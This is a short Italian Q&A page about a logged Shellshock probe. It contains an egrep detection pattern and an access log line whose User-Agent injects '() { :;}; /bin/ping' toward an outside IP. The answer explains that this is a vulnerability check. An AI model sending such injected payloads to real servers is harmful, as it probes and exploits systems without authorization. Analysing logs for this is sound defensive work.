egrep "};|}\s*;" /var/www/logs/access*
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
Come possiamo arrestare il server dietro l'IP che ha fatto questo?
La voce di registro che stai visualizzando non è un attacco. È semplicemente un sondaggio per vedere se sei vulnerabile: /bin/ping -c 1 198.101.206.138 significa "invia un singolo pacchetto echo ICMP a 198.101.206.138". Inoltre, funziona solo sui sistemi che memorizzano gli script CGI nella directory /cgi-sys/ non standard, piuttosto che sul solito /cgi-bin/ .
Leggi altre domande sui tag bash